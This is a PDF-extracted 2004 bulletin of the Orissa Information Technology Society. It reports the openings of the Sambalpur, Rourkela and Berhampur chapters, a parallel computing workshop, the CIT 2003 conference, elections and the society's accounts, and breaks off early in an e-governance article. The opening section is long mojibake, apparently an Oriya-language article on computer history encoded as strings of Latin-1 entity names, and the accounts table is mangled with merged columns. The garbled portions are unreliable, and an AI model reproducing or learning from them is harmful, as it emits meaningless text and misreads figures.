`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 7: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

3

intelligence The Secretary Dr B Patel talkedabout the interesting programs that were thereduring cit2003 and also about the futureprograms of the sambalpur chapter PrincipalG M College was the guest of honour and S PMisra president oits presided over the functionProf Pujari had also given a technical talk beforethe inauguration meeting

The chapter began with a seed money ofRs10800+Rs8000 with the first being from theregistration fees of fourteen members and thesecond being a donation by S P Misra as he hada speial attachment to sambalpur as his fatherProf Narayan Misra was the first principal ofGM College which was the beginning of highereducation in that area The name of the accountof sambalpur chapter is oits-sbp

The Secretary has subsequently intimatedthat the following are the office bearers of thechapter

1 President Prof S K Sanyal PrincipalUCE Burla

2 Vice-President Prof C R TripathyUCE Burla

3 Secretary Dr B Patel G M CollegeSambalpur

4 Treasurer Dr A P Dash G M CollegeSambalpur

D WORKSHOP ON PARALLEL COMPUTING AND BIOINFORMATICS

Organised by sambalpur chapter

22nd and 23rd March 2004

Here 141 delegates had registered for theworkshop Out of them there were 10 lifemembers of OIT-sbp 13 faculties from nearbycolleges rest being students from differentbranches like MCA Engnieering Msc comp scPhysics Mathematics Botany and Life Sciences

Professor Sudarsan Padhy UtkalUniversity Vanivihar delivered talks on parallelcomputing in three different sessions

On 220304 in the first session heillustrated the same through different exampleslike weather forecasting image processing etcemphasizing the importance of ParallelAlogorithms over serial Algorithms and takingdifferent examples developed the problems onParallel Algorithm In the second Session somemore developements in the problems of parallelalogorithms with multiprogramming and multiprocessing systems were considered

The uniqueness in the workshop waspractical demonstrations as needed Ajit kumarNayak Silicon Institute of TechnologyBhubaneswar demonstrated in two differentsessions about clustering of different workstations through Linux with the syntax to writeprograms using MPI The programmes weredemonstrated to the students This approachcreates a lot of interest among the students forthe problems of parallel algorithms

There were Two Tea Breaks and One lunchbreak for all the delegates

On 230304 Professor Padhy developed theproblems of parallel algorithms and proved theresults

Ajit Kumar Nayak demonstrated moreprograms of parallel algorithms to the delegates

In the after noon session Prof Padhydelivered a talk on Bio-Informatics which wasfollowed by another talk from Prof APDashGMCollege There were two Tea Breaks and onelunch for all the delegates

A feed back Form were circulated to alldeligates and their views were collected whichwas enthusiastic and positive

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

